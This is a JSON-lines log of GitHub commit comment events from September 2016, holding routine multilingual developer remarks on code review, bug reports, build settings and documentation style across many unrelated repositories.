{"id":"4577816100","type":"CommitCommentEvent","actor":{"login":"MOVZX"},"repo":{"name":"CM-FK/android_kernel_xiaomi_msm8956"},"payload":{"comment":{"id":19064426,"position":null,"line":null,"path":null,"commit_id":"fdf5f6a851a201618399dc06485d9da3868c6fbb","created_at":"2016-09-17T11:33:14Z","updated_at":"2016-09-17T11:33:14Z","body":"The automatic HBM (High Brightness Mode) is missing from this SRE. It acts like original Qualcomm Assertive Display in high brightness mode like when phone used under bright sunlight."}},"created_at":"2016-09-17T11:33:14Z"}
{"id":"4577816613","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064427,"position":null,"line":null,"path":null,"commit_id":"804c467361dee9eac333982967bd9160c64fb73a","created_at":"2016-09-17T11:33:42Z","updated_at":"2016-09-17T11:33:42Z","body":"код ревью выполнен"}},"created_at":"2016-09-17T11:33:42Z"}
{"id":"4577816724","type":"CommitCommentEvent","actor":{"login":"bcourter"},"repo":{"name":"bcourter/SpaceClaim-Addins-Experimental"},"payload":{"comment":{"id":19064428,"position":null,"line":null,"path":null,"commit_id":"cfed98af9e2028bbd28749bc2843374f681eb644","created_at":"2016-09-17T11:33:48Z","updated_at":"2016-09-17T11:33:48Z","body":"Funny, I made forstnerize because I didn't have a CNC machine. I am doing a\nlot of work with lattices today. What are you trying to do?\n\nOn Sep 17, 2016 6:00 AM, \"nicolasmarc\" <notifications@github.com> wrote:\n\n> Hi Blake, how are you?\n> AET tools seems very interesting for additive manufcturing, i think\n> forstnerize could be useful for create lattice but work only Z direction ?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/bcourter/SpaceClaim-Addins-Experimental/commit/cfed98af9e2028bbd28749bc2843374f681eb644#commitcomment-19064203>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABUQPY5PV317I6IKF1OUSTm_Qyij9QUEks5qq7ocgaJpZM4J_j0z>\n> .\n>\n"}},"created_at":"2016-09-17T11:33:48Z"}
{"id":"4577817022","type":"CommitCommentEvent","actor":{"login":"sonamsingh28"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064429,"position":200,"line":200,"path":"termcase.module","commit_id":"6885143413a72e4a73bf8a79782277af382fcfb0","created_at":"2016-09-17T11:34:04Z","updated_at":"2016-09-17T11:34:04Z","body":"Please help me with the standard way of writing comments for a function."}},"created_at":"2016-09-17T11:34:04Z"}
{"id":"4577817071","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064430,"position":null,"line":null,"path":null,"commit_id":"a9f7dcd99f4cee6dacb5cb8fe2e4695de579a1c9","created_at":"2016-09-17T11:34:06Z","updated_at":"2016-09-17T11:34:06Z","body":"код ревью выполнен"}},"created_at":"2016-09-17T11:34:06Z"}
{"id":"4577818029","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064431,"position":null,"line":null,"path":null,"commit_id":"3ddace2b888f98a98ac2971fa79c46738e071df2","created_at":"2016-09-17T11:34:54Z","updated_at":"2016-09-17T11:34:54Z","body":"код ревью выполнен"}},"created_at":"2016-09-17T11:34:54Z"}
{"id":"4577818541","type":"CommitCommentEvent","actor":{"login":"TingyiChen"},"repo":{"name":"Silentlys/android_kernel_lenovo_msm8916"},"payload":{"comment":{"id":19064433,"position":null,"line":null,"path":null,"commit_id":"e877bc9c7dae34d5f39f8d5dc1b8bcda510255e3","created_at":"2016-09-17T11:35:21Z","updated_at":"2016-09-17T11:35:21Z","body":"\r\n@dev-harsh1998 I bought a Lenovo K31-T3 6 days ago.It released Lollipop.But I found it is 32bit and Lenovo doesn't release its kernel source code.....I think I need 32bit tree now........There isn't any rom or recovery for it now....So I had to compile it myself....."}},"created_at":"2016-09-17T11:35:21Z"}
{"id":"4577818982","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064435,"position":null,"line":null,"path":null,"commit_id":"b416b2d60d30ba9765cdc977e07cf7beca7de01a","created_at":"2016-09-17T11:35:46Z","updated_at":"2016-09-17T11:35:46Z","body":"код ревью выполнен"}},"created_at":"2016-09-17T11:35:46Z"}
{"id":"4577819633","type":"CommitCommentEvent","actor":{"login":"heiko-braun"},"repo":{"name":"microprofile/microprofile-conference"},"payload":{"comment":{"id":19064437,"position":null,"line":null,"path":null,"commit_id":"5232dfa7550937c7dc8f888071f4159d426edced","created_at":"2016-09-17T11:36:18Z","updated_at":"2016-09-17T11:36:18Z","body":"thanks @AndyGee "}},"created_at":"2016-09-17T11:36:18Z"}
{"id":"4577819787","type":"CommitCommentEvent","actor":{"login":"jingai"},"repo":{"name":"jingai/skin.metropolis"},"payload":{"comment":{"id":19064438,"position":null,"line":null,"path":null,"commit_id":"864a5d3423c9aa7b9698e7c20245e88dcbd41c34","created_at":"2016-09-17T11:36:25Z","updated_at":"2016-09-17T11:36:25Z","body":"Had some time to look at this.  I just copy/pasted the wrong visibility condition for it.  Let me know if 9877b7d42051feede1aff0098a46e3fbdf306ba9 fixes it for you."}},"created_at":"2016-09-17T11:36:25Z"}
{"id":"4577819865","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19064439,"position":null,"line":null,"path":null,"commit_id":"f54458b19b4342f784edd92e626fbbc3875c05cb","created_at":"2016-09-17T11:36:31Z","updated_at":"2016-09-17T11:36:31Z","body":"C语言关于值和址的区别"}},"created_at":"2016-09-17T11:36:31Z"}
{"id":"4577819904","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064440,"position":null,"line":null,"path":null,"commit_id":"4f26c8485f02722bc29545a545f68046fcbc04bf","created_at":"2016-09-17T11:36:33Z","updated_at":"2016-09-17T11:36:33Z","body":"код ревью выполнен"}},"created_at":"2016-09-17T11:36:33Z"}
{"id":"4577821025","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064442,"position":null,"line":null,"path":null,"commit_id":"40f22b24aae49d36ef6e363291d5adad2f54743f","created_at":"2016-09-17T11:37:33Z","updated_at":"2016-09-17T11:37:33Z","body":"блин а зачем же логотипы было в гит то загружать?))"}},"created_at":"2016-09-17T11:37:33Z"}
{"id":"4577821339","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064443,"position":null,"line":null,"path":null,"commit_id":"79b253af93ce169737cdb1176096591c003a2986","created_at":"2016-09-17T11:37:52Z","updated_at":"2016-09-17T11:37:52Z","body":"код ревью выполнен"}},"created_at":"2016-09-17T11:37:52Z"}
{"id":"4577822887","type":"CommitCommentEvent","actor":{"login":"gooryalhamed"},"repo":{"name":"gooryalhamed/countdown-to-midnight-re-coded-000"},"payload":{"comment":{"id":19064449,"position":null,"line":null,"path":null,"commit_id":"6afce16c26b37dd0a4a13276f86f0c5fc40cb23c","created_at":"2016-09-17T11:39:19Z","updated_at":"2016-09-17T11:39:19Z","body":"remove solution"}},"created_at":"2016-09-17T11:39:19Z"}
{"id":"4577822917","type":"CommitCommentEvent","actor":{"login":"basic4"},"repo":{"name":"basic4/WiDucky"},"payload":{"comment":{"id":19064450,"position":null,"line":null,"path":null,"commit_id":"d5e5601e7c3339fac8f557ff1aa1b6e012332ab9","created_at":"2016-09-17T11:39:21Z","updated_at":"2016-09-17T11:39:21Z","body":"etsygh"}},"created_at":"2016-09-17T11:39:21Z"}
{"id":"4577825867","type":"CommitCommentEvent","actor":{"login":"sintsov"},"repo":{"name":"SGolenzovskiy/altrc"},"payload":{"comment":{"id":19064456,"position":null,"line":null,"path":null,"commit_id":"00d045db93fe9c7a3d82bd6444dde6407540ed3b","created_at":"2016-09-17T11:41:56Z","updated_at":"2016-09-17T11:41:56Z","body":"с лого у нас есть проблема, что при импорте, что при сохранение. Сейчас если имена логотипов совпадают, то случайно ты можешь перезатереть логотип другого проекта. Нам бы нужно допилить проверку существования файла с таким именем, и если он существует, тогда добавлять ему _increment++.\r\n\r\nСоздал на эту тему тикет https://github.com/SGolenzovskiy/altrc/issues/18"}},"created_at":"2016-09-17T11:41:56Z"}
{"id":"4577826194","type":"CommitCommentEvent","actor":{"login":"ChriZathens"},"repo":{"name":"ccrisan/motioneye"},"payload":{"comment":{"id":19064458,"position":null,"line":null,"path":null,"commit_id":"8bfa621874a5078928687d89f3d517aeecfea7f0","created_at":"2016-09-17T11:42:14Z","updated_at":"2016-09-17T11:42:14Z","body":"Heh, you know I am very interested in your project :+1: \r\nJust one question: Noticed today that I had movie quality set to 100% and since I don't need best quality and want to preserve some space, I set it to 50%. However I saw no decrease in filesize (or in quality). same thing if I set to HEVC mp4 or .mkv\r\nIs it something that is yet to be implemented for .mp4 and .mkv, or simply a bug, or problem on my part?"}},"created_at":"2016-09-17T11:42:14Z"}
{"id":"4577829526","type":"CommitCommentEvent","actor":{"login":"nokizorque"},"repo":{"name":"nokizorque/nokizorque.github.io"},"payload":{"comment":{"id":19064466,"position":null,"line":null,"path":null,"commit_id":"b818473346377e6ad8d2702f76eae45257aba7f7","created_at":"2016-09-17T11:45:13Z","updated_at":"2016-09-17T11:45:13Z","body":"It worked."}},"created_at":"2016-09-17T11:45:13Z"}
{"id":"4577831264","type":"CommitCommentEvent","actor":{"login":"Pieter12345"},"repo":{"name":"EngineHub/CommandHelper"},"payload":{"comment":{"id":19064470,"position":24,"line":474,"path":"src/main/java/com/laytonsmith/core/functions/Threading.java","commit_id":"5155e7a367f3741821bbd2bb212d691bf2fed039","created_at":"2016-09-17T11:46:43Z","updated_at":"2016-09-17T11:46:43Z","body":"Something with a 120 chars per line convention and not really being able to read it anyways. Do you prefer one line per \\n in the code?"}},"created_at":"2016-09-17T11:46:43Z"}
{"id":"4577832229","type":"CommitCommentEvent","actor":{"login":"vitalyp"},"repo":{"name":"McLoy/EasyTasks"},"payload":{"comment":{"id":19064471,"position":null,"line":null,"path":null,"commit_id":"b48d1658df5707f467e34d4fdde1c14006a95f83","created_at":"2016-09-17T11:47:36Z","updated_at":"2016-09-17T11:47:36Z","body":"> Да это же..  Эпичный Таск !"}},"created_at":"2016-09-17T11:47:36Z"}
{"id":"4577832764","type":"CommitCommentEvent","actor":{"login":"tkntrec"},"repo":{"name":"xtne6f/EDCB"},"payload":{"comment":{"id":19064473,"position":null,"line":null,"path":null,"commit_id":"0771bd44a8ab25df7c37eef5fa9fda609309afa5","created_at":"2016-09-17T11:48:05Z","updated_at":"2016-09-17T11:48:05Z","body":"どうもです。\r\n不具合らしき現象を報告させていただきます。\r\n\r\n・このコミットを適用すると、輻輳時にEpgTimerSrvがフリーズする\r\n\r\n例えば、次の手順で発生します。\r\n\r\n1) EPG自動登録を2つ以上作成し、それぞれ予約が入っている状態にする\r\n2) EPG自動登録で作成された予約を一覧などから一つ削除\r\n3) EpgTimerSrvとEpgTimerを終了\r\n4) EpgTimer+EpgTimerSrvを再起動(EpgTimerSrvはEpgTimerから連動起動させる)\r\n\r\nEpgTimerSrv再起動の際、2)で削除された予約の復元中にEpgTimerから予約一覧の取得が入り、そのタイミングでフリーズするようです。\r\n他にもEpgTimerとEpgTimerNW間での画面更新などでも類似の状況を作ると同様にフリーズさせられます。\r\n\r\n再現しますでしょうか？"}},"created_at":"2016-09-17T11:48:05Z"}
{"id":"4577832791","type":"CommitCommentEvent","actor":{"login":"trav90"},"repo":{"name":"MoonchildProductions/Pale-Moon"},"payload":{"comment":{"id":19064474,"position":null,"line":null,"path":null,"commit_id":"29df21f59586424c1f0afb1e4fbe017938cfcce7","created_at":"2016-09-17T11:48:06Z","updated_at":"2016-09-17T11:48:06Z","body":"GCC doesn't like the #pragma loop and throws warnings about ignoring it.\r\n\r\nMight be better to put these behind an #ifdef."}},"created_at":"2016-09-17T11:48:06Z"}
{"id":"4577833561","type":"CommitCommentEvent","actor":{"login":"sbrannen"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":19064476,"position":33,"line":36,"path":"spring-web-reactive/src/main/java/org/springframework/web/reactive/function/BodyInsertor.java","commit_id":"3f5570641359b13c3d9139879c66500f31d007c5","created_at":"2016-09-17T11:48:45Z","updated_at":"2016-09-17T11:48:45Z","body":"Although \"insertor\" is apparently acceptable in special contexts (at least as I learned from a quick Google search), the common (correct?) spelling with regard to technology is \"inserter\". 😉 "}},"created_at":"2016-09-17T11:48:45Z"}
{"id":"4577834052","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064478,"position":200,"line":200,"path":"termcase.module","commit_id":"6885143413a72e4a73bf8a79782277af382fcfb0","created_at":"2016-09-17T11:49:10Z","updated_at":"2016-09-17T11:49:10Z","body":"The standard way to write any comments for a function is very simple and straightforward.\r\n\r\nSee below comments\r\n\r\n/**\r\n * Return an associative array of the custom menus names.\r\n *\r\n * @param bool $all\r\n *   (optional) If FALSE return only user-added menus, or if TRUE also include\r\n *   the menus defined by the system. Defaults to TRUE.\r\n * @param \\Drupal\\node\\NodeInterface $node\r\n *   The node entity.\r\n *   \r\n * @return array\r\n *   An array with the machine-readable names as the keys, and human-readable titles as the values.\r\n\r\n*/\r\nfunction termcase_print_hello($all = TRUE, \\Drupal\\node\\NodeInterface $node) {\r\n\r\n  return array(\"Hello\");\r\n}\r\n\r\nSee in above comments,\r\n\r\n1. Always write one line of description about the function.\r\n2. If you want to write more, leave a blank line after the first line and write it in description.\r\nSee below example\r\n\r\n/**\r\n * Return an associative array of the custom menus names.\r\n *\r\n * It will make an entry in database about the menu and check if menu is\r\n * already exist in the database so update that entry.\r\n *\r\n * @param bool $all\r\n *\r\n\r\n3. Write about all the parameters that are being used in that function using the @param keyword. Define all @param without any blank line.\r\n4. Now define function return type. We never specify variable name we just need to define its type (Like array, int. string) and little bit it's description. \r\n"}},"created_at":"2016-09-17T11:49:10Z"}
{"id":"4577834202","type":"CommitCommentEvent","actor":{"login":"LadyCailin"},"repo":{"name":"EngineHub/CommandHelper"},"payload":{"comment":{"id":19064479,"position":24,"line":474,"path":"src/main/java/com/laytonsmith/core/functions/Threading.java","commit_id":"5155e7a367f3741821bbd2bb212d691bf2fed039","created_at":"2016-09-17T11:49:18Z","updated_at":"2016-09-17T11:49:18Z","body":"Yeah, in this case, you should ignore the 120 convention and make it readable. Easier to see what's going on and change it later. \n\n> On 17 Sep 2016, at 13:46, Pietje <notifications@github.com> wrote:\n> \n> Something with a 120 chars per line convention and not really being able to read it anyways. Do you prefer one line per \\n in the code?\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-17T11:49:18Z"}
{"id":"4577835910","type":"CommitCommentEvent","actor":{"login":"nilminus"},"repo":{"name":"nilminus/base_nix"},"payload":{"comment":{"id":19064481,"position":null,"line":null,"path":null,"commit_id":"f8e5933b2fbabb4589708317f4e4045c7e70c89f","created_at":"2016-09-17T11:50:47Z","updated_at":"2016-09-17T11:50:47Z","body":"vmhgfs stuff"}},"created_at":"2016-09-17T11:50:47Z"}
{"id":"4577838587","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"openfl/openfl"},"payload":{"comment":{"id":19064484,"position":null,"line":null,"path":null,"commit_id":"66b9f80b236a217b985a6e135f4bb3cb888948c1","created_at":"2016-09-17T11:53:06Z","updated_at":"2016-09-17T11:53:06Z","body":"I guess this works too. :+1: "}},"created_at":"2016-09-17T11:53:06Z"}
{"id":"4577838590","type":"CommitCommentEvent","actor":{"login":"MaheshNaikM"},"repo":{"name":"MaheshNaikM/clippers"},"payload":{"comment":{"id":19064485,"position":null,"line":null,"path":null,"commit_id":"87319592150c9cff0afb22577cc2f2008318df4a","created_at":"2016-09-17T11:53:06Z","updated_at":"2016-09-17T11:53:06Z","body":"the file gps.pas is murtas general polygon clipper with bugs and warms removed.Especially glaring was the triangle strip error. This version uses srtin and also the elder wand to organise bundle intersections.\r\nIt is as fast as AAngus johnsons clipper for unbundled edges and much faster if bundles occur.\r\n           --Ignorant    maheshnaik dot mumbai  at googlemail dot com"}},"created_at":"2016-09-17T11:53:06Z"}
{"id":"4577839551","type":"CommitCommentEvent","actor":{"login":"k3b"},"repo":{"name":"osmdroid/osmdroid"},"payload":{"comment":{"id":19064486,"position":null,"line":null,"path":null,"commit_id":"11790a7524bc4e48621abb90e84c08b214389300","created_at":"2016-09-17T11:53:52Z","updated_at":"2016-09-17T11:53:52Z","body":"re travis graphviz  without sudo\r\n\r\nI use \r\n\r\n\taddons:\r\n\t  apt:\r\n\t\tpackages:\r\n\t# graphviz to render javadoc uml\r\n\t# https://docs.travis-ci.com/user/multi-os/\r\n\t\t  - graphviz\r\n"}},"created_at":"2016-09-17T11:53:52Z"}
{"id":"4577840234","type":"CommitCommentEvent","actor":{"login":"AntoninataRiech"},"repo":{"name":"McSwaggens/linux-csgo-external"},"payload":{"comment":{"id":19064487,"position":null,"line":null,"path":null,"commit_id":"d90914d7f56b9ae80cf533f3f0e561d817ec1ade","created_at":"2016-09-17T11:54:27Z","updated_at":"2016-09-17T11:54:27Z","body":"Nice job!"}},"created_at":"2016-09-17T11:54:27Z"}
{"id":"4577840918","type":"CommitCommentEvent","actor":{"login":"MaheshNaikM"},"repo":{"name":"MaheshNaikM/clippers"},"payload":{"comment":{"id":19064488,"position":null,"line":null,"path":null,"commit_id":"87319592150c9cff0afb22577cc2f2008318df4a","created_at":"2016-09-17T11:55:03Z","updated_at":"2016-09-17T11:55:03Z","body":"It is only for odd/even parity as was the Murta coder from university of manchester. for a wonderfuk writeup on that coder write to their license manager ..toby howard"}},"created_at":"2016-09-17T11:55:03Z"}
{"id":"4577842548","type":"CommitCommentEvent","actor":{"login":"TheScarletSword"},"repo":{"name":"TheScarletSword/pokereddeluxe"},"payload":{"comment":{"id":19064489,"position":null,"line":null,"path":null,"commit_id":"2f9122a80ce73f7d442a69f22c9a6c5207b888b1","created_at":"2016-09-17T11:56:21Z","updated_at":"2016-09-17T11:56:21Z","body":"You mean this game still exists?\r\n\r\nA few old friends of mine found RBDX and started to dig out a number of bugs, decided to fix them on the spot. I'll be returning to give RBDX a long awaited update soon, sometime in the Winter months. I would be working on it now, but I'm busy with a Fire Emblem-related personal side project."}},"created_at":"2016-09-17T11:56:21Z"}
{"id":"4577842710","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064490,"position":1,"line":1,"path":"config/install/termcase.settings.yml","commit_id":"6885143413a72e4a73bf8a79782277af382fcfb0","created_at":"2016-09-17T11:56:30Z","updated_at":"2016-09-17T11:56:30Z","body":"Yes please remove this file. This is of no use."}},"created_at":"2016-09-17T11:56:30Z"}
{"id":"4577844796","type":"CommitCommentEvent","actor":{"login":"steko"},"repo":{"name":"zackbatist/DObsiSS"},"payload":{"comment":{"id":19064498,"position":53,"line":53,"path":"datapackage.json","commit_id":"e2da9de518d8aab9ead782fc310c1b8f094de8fd","created_at":"2016-09-17T11:58:27Z","updated_at":"2016-09-17T11:58:27Z","body":"Should you have \"name\" : \"Longitude\" here?"}},"created_at":"2016-09-17T11:58:27Z"}
{"id":"4577845988","type":"CommitCommentEvent","actor":{"login":"nicolasmarc"},"repo":{"name":"bcourter/SpaceClaim-Addins-Experimental"},"payload":{"comment":{"id":19064502,"position":null,"line":null,"path":null,"commit_id":"cfed98af9e2028bbd28749bc2843374f681eb644","created_at":"2016-09-17T11:59:27Z","updated_at":"2016-09-17T11:59:27Z","body":"I think \"Halftoner\" see the link: http://jasondorie.com/page_cnc.html\r\nas you search at make with forstnerize.\r\n\"Halftoner\" work very well.\r\nI see  Forstnerize like \"Element by nT Topology\" see the link:http://www.ntopology.com/element-free/\r\nAnd this video for my idea of utility of \"Forstnerise\":\r\nhttps://www.youtube.com/watch?v=kh5jKgsEQak"}},"created_at":"2016-09-17T11:59:27Z"}
{"id":"4577846505","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":19064503,"position":null,"line":null,"path":null,"commit_id":"342ff83c2cd330b8638f59e9e482c974e2fd4c05","created_at":"2016-09-17T11:59:54Z","updated_at":"2016-09-17T11:59:54Z","body":"Done."}},"created_at":"2016-09-17T11:59:54Z"}
{"id":"4577847910","type":"CommitCommentEvent","actor":{"login":"pjhjohn"},"repo":{"name":"pjhjohn/festime"},"payload":{"comment":{"id":19064504,"position":null,"line":null,"path":null,"commit_id":"d2d7902779aa3b522b0afb5642cc428845dee22e","created_at":"2016-09-17T12:00:45Z","updated_at":"2016-09-17T12:00:45Z","body":"Since `PR` #12 have this commit as a parent commit, merging `PR` #12 closed `PR` #11 at the time of merging `PR` #12"}},"created_at":"2016-09-17T12:00:45Z"}
{"id":"4577849814","type":"CommitCommentEvent","actor":{"login":"7heo"},"repo":{"name":"7heo/mkinitfs"},"payload":{"comment":{"id":19064507,"position":null,"line":null,"path":null,"commit_id":"26010b67f45a41217a76d9f6c88312ba28a4dd19","created_at":"2016-09-17T12:02:15Z","updated_at":"2016-09-17T12:02:15Z","body":"Fixes #9"}},"created_at":"2016-09-17T12:02:15Z"}
{"id":"4577850995","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064508,"position":1,"line":1,"path":"config/schema/termcase.schema.yml","commit_id":"6885143413a72e4a73bf8a79782277af382fcfb0","created_at":"2016-09-17T12:02:26Z","updated_at":"2016-09-17T12:02:26Z","body":"No, These both files are totally different\r\n\r\n.settings.yml file is used to set default file while installing the module\r\nand the .schema.yml file is used for multilingual."}},"created_at":"2016-09-17T12:02:26Z"}
{"id":"4577851820","type":"CommitCommentEvent","actor":{"login":"7heo"},"repo":{"name":"7heo/mkinitfs"},"payload":{"comment":{"id":19064510,"position":null,"line":null,"path":null,"commit_id":"26010b67f45a41217a76d9f6c88312ba28a4dd19","created_at":"2016-09-17T12:03:06Z","updated_at":"2016-09-17T12:03:06Z","body":"Fixes #8 "}},"created_at":"2016-09-17T12:03:06Z"}
{"id":"4577852675","type":"CommitCommentEvent","actor":{"login":"7heo"},"repo":{"name":"7heo/mkinitfs"},"payload":{"comment":{"id":19064511,"position":null,"line":null,"path":null,"commit_id":"26010b67f45a41217a76d9f6c88312ba28a4dd19","created_at":"2016-09-17T12:03:48Z","updated_at":"2016-09-17T12:03:48Z","body":"Fixes #7"}},"created_at":"2016-09-17T12:03:48Z"}
{"id":"4577855313","type":"CommitCommentEvent","actor":{"login":"ankit167"},"repo":{"name":"smarthackers/GameOfLife"},"payload":{"comment":{"id":19064516,"position":7,"line":7,"path":"models.py","commit_id":"c95ec5b643271a5fc29da3fac322b3fc670502fc","created_at":"2016-09-17T12:06:03Z","updated_at":"2016-09-17T12:06:03Z","body":"nit, consistency is good. lets keep variable in lower cases."}},"created_at":"2016-09-17T12:06:03Z"}
{"id":"4577855765","type":"CommitCommentEvent","actor":{"login":"thp1997"},"repo":{"name":"SlimRoms/frameworks_opt_slim"},"payload":{"comment":{"id":19064517,"position":null,"line":null,"path":null,"commit_id":"da6dd1be2312b8ed5ed8bac621a1f979a2a677f4","created_at":"2016-09-17T12:06:24Z","updated_at":"2016-09-17T12:06:24Z","body":"revert this commit , its causing hw key vibration issue ."}},"created_at":"2016-09-17T12:06:24Z"}
{"id":"4577855766","type":"CommitCommentEvent","actor":{"login":"akashjain132"},"repo":{"name":"sonamsingh28/termcase"},"payload":{"comment":{"id":19064518,"position":1,"line":1,"path":"config/schema/termcase.schema.yml","commit_id":"6885143413a72e4a73bf8a79782277af382fcfb0","created_at":"2016-09-17T12:06:24Z","updated_at":"2016-09-17T12:06:24Z","body":"So this file will always exist if you have any page.\r\n\r\nPlease define termcase_options  and termcase_update_terms variables in this file."}},"created_at":"2016-09-17T12:06:24Z"}
{"id":"4577858729","type":"CommitCommentEvent","actor":{"login":"boutros"},"repo":{"name":"digibib/ls.ext"},"payload":{"comment":{"id":19064525,"position":null,"line":null,"path":null,"commit_id":"f59e0db74db4a7a2dd20b7f4b8e749f40775fc7c","created_at":"2016-09-17T12:08:50Z","updated_at":"2016-09-17T12:08:50Z","body":"Kan antageligvis fjerne en del fra denne spørringen også - denne indeksen brukes kun av catalinker, og jeg tviler på at alle felt brukes?"}},"created_at":"2016-09-17T12:08:50Z"}
{"id":"4577858859","type":"CommitCommentEvent","actor":{"login":"julius-jsr"},"repo":{"name":"smarthackers/GameOfLife"},"payload":{"comment":{"id":19064526,"position":7,"line":7,"path":"models.py","commit_id":"c95ec5b643271a5fc29da3fac322b3fc670502fc","created_at":"2016-09-17T12:08:58Z","updated_at":"2016-09-17T12:08:58Z","body":"done !!\r\n"}},"created_at":"2016-09-17T12:08:58Z"}
{"id":"4577861058","type":"CommitCommentEvent","actor":{"login":"shasheene"},"repo":{"name":"amboar/gnuradio"},"payload":{"comment":{"id":19064527,"position":8,"line":68,"path":"CMakeLists.txt","commit_id":"9667e4f0df479cc279093cba9d8065aba6b56206","created_at":"2016-09-17T12:10:52Z","updated_at":"2016-09-17T12:10:52Z","body":"Have you tested this patch with Clang? I understand the switch interface is compatible, so you may want to duplicate the switches.\r\n\r\n(Clear/explicit but duplicated is presumably preferred if switch interface can have differences between clang/gcc)"}},"created_at":"2016-09-17T12:10:52Z"}
{"id":"4577862921","type":"CommitCommentEvent","actor":{"login":"Bauuuuu"},"repo":{"name":"Bauuuuu/android_kernel_zte_nx512j"},"payload":{"comment":{"id":19064532,"position":null,"line":null,"path":null,"commit_id":"826da1aaff488ef11e846e2ee9f982c0a60686fa","created_at":"2016-09-17T12:12:27Z","updated_at":"2016-09-17T12:12:27Z","body":"ideally it should not if you do it root shell"}},"created_at":"2016-09-17T12:12:27Z"}
{"id":"4577864435","type":"CommitCommentEvent","actor":{"login":"ibilon"},"repo":{"name":"openfl/openfl"},"payload":{"comment":{"id":19064535,"position":null,"line":null,"path":null,"commit_id":"66b9f80b236a217b985a6e135f4bb3cb888948c1","created_at":"2016-09-17T12:13:52Z","updated_at":"2016-09-17T12:13:52Z","body":"I guess this could be checked at compile time, lime seems to use new instead of Type in its template. I'll have to check it."}},"created_at":"2016-09-17T12:13:52Z"}
{"id":"4577868643","type":"CommitCommentEvent","actor":{"login":"SoftPoison"},"repo":{"name":"SoftPoison/PYssword-Safe"},"payload":{"comment":{"id":19064541,"position":116,"line":99,"path":"PYssword-Safe.py","commit_id":"ec1c00fa4c6cbc5ff2c02911aa80251b39987aeb","created_at":"2016-09-17T12:17:38Z","updated_at":"2016-09-17T12:17:38Z","body":"How I originally planned to check email addresses. It didn't work so I moved away from it later."}},"created_at":"2016-09-17T12:17:38Z"}
{"id":"4577870955","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19064545,"position":null,"line":null,"path":null,"commit_id":"50315f59da4b448864730f65f730d4e8fe34e08d","created_at":"2016-09-17T12:19:51Z","updated_at":"2016-09-17T12:19:51Z","body":"@SubJunk Randomly the build would fail with ```ConcurrentModificationException``` during tests because of lacking thread safety. This would never happend during normal runs since it's only called during ```PMS.init()``` (and thus only run by one thread), but Maven runs the tests concurrently and thus this could happen. I've tried to explain it in Javadoc in source. The diff looks big here on GitHub, but if you view it with a smarter diff tool (turn of whitespace diff) you will see that it's really not. The thing is that I had to enclose the whole method ```loadRendererConfigurations()``` with a synchronized block, and thus indentation is changed - and GitHub diff goes crazy.\r\n\r\nIt's hard to be sure a random behaviour is fixed, but I did quite a few builds both before and after the fix, and before the fix 50-60% would fail for me. After the fix I got no failure. Why this hasn't been an issue before I don't know, but since synchronization issues depend on nanosecond timing the slightest seemingly non-related change can trigger it.\r\n\r\nIn general all static class variables that are potentially written from several threads is very much at risk for concurrency issues since there is only one instance of the class \"behind the scenes\". Imo all static class variables need to be protected unless they are explicitly only called from one thread (like the \"main\" or \"GUI\" thread)."}},"created_at":"2016-09-17T12:19:51Z"}
{"id":"4577873773","type":"CommitCommentEvent","actor":{"login":"spyhunter99"},"repo":{"name":"osmdroid/osmdroid"},"payload":{"comment":{"id":19064549,"position":null,"line":null,"path":null,"commit_id":"11790a7524bc4e48621abb90e84c08b214389300","created_at":"2016-09-17T12:22:25Z","updated_at":"2016-09-17T12:22:25Z","body":"Its GPL licensed, not sure if that presents a problem, probably is"}},"created_at":"2016-09-17T12:22:25Z"}
{"id":"4577874099","type":"CommitCommentEvent","actor":{"login":"marcopeereboom"},"repo":{"name":"jrick/gominer"},"payload":{"comment":{"id":19064550,"position":null,"line":null,"path":null,"commit_id":"e4c5d231e3c1a0c3ca591b947708520a8e93bc4d","created_at":"2016-09-17T12:22:42Z","updated_at":"2016-09-17T12:22:42Z","body":"I like this.  Need to test it on hardware, though."}},"created_at":"2016-09-17T12:22:42Z"}
{"id":"4577874264","type":"CommitCommentEvent","actor":{"login":"hennessytj"},"repo":{"name":"hennessytj/insertionSort"},"payload":{"comment":{"id":19064551,"position":null,"line":null,"path":null,"commit_id":"f0c65f37de8a54cbd8511659459dae075a33dd2a","created_at":"2016-09-17T12:22:50Z","updated_at":"2016-09-17T12:22:50Z","body":"Removed portion resulted from insufficient memory provided through Dr. Java, no memory related errors are caused by the Insertion.java code.  Once Java heap space was increased, this was not an issue."}},"created_at":"2016-09-17T12:22:50Z"}
